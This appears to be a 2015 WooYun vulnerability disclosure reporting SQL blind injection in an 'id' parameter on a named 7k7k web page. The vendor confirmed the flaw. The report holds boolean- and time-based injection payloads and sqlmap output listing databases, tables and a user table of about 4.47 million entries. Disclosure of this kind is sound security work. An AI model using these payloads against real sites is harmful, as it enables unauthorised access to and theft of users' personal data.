当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131888

漏洞标题:奇客星空某处存在SQL盲注(涉及近450W用户数据)

相关厂商:奇客星空

漏洞作者: 紫霞仙子

提交时间:2015-08-06 11:15

修复时间:2015-09-20 12:02

公开时间:2015-09-20 12:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

啦啦啦啦。

详细说明:

有活动啦。
web.7k7k.com/games/huodong/touch/fzsjds2/show.php?id=622
先脚本跑一下,
发现是 盲注 and 1=1

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=622 AND 7251=7251
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=622 AND (SELECT * FROM (SELECT(SLEEP(5)))JNrn)
---
[16:46:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
我靠,竟然跑不出来数据。。。。。
哈哈,简单绕过:
available databases [2]:
[*] information_schema
[*] web7k
这次才299张表,
WooYun: 奇客星空某站SQL注射涉及400多万用户数据DBA权限
这次312张了。
[16:53:07] [INFO] fetching tables for database: 'web7k'
[16:53:07] [INFO] fetching number of tables for database 'web7k'
[16:53:07] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:53:07] [INFO] retrieved: 312
[16:53:15] [INFO] retrieved: admin_menu
[16:54:05] [INFO] retrieved: admin_user
[16:54:59] [INFO] retrieved: admin_user_role
[16:56:09] [INFO] retrieved: baidu_keywordid
[16:57:16] [INFO] retrieved: 。。。。。。。
Database: web7k
+----------+---------+
| Table | Entries |
+----------+---------+
| uc_user1 | 4471899 |
+----------+---------+

修复方案:

这次如你们说的 :“有点创意吗? 标题能不包含400万吗? 你说给20rank我就给20啊?”
所以这次不说了。因为已经不是400万了。

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-06 12:00

厂商回复:

感谢白帽子反馈

最新状态:

暂无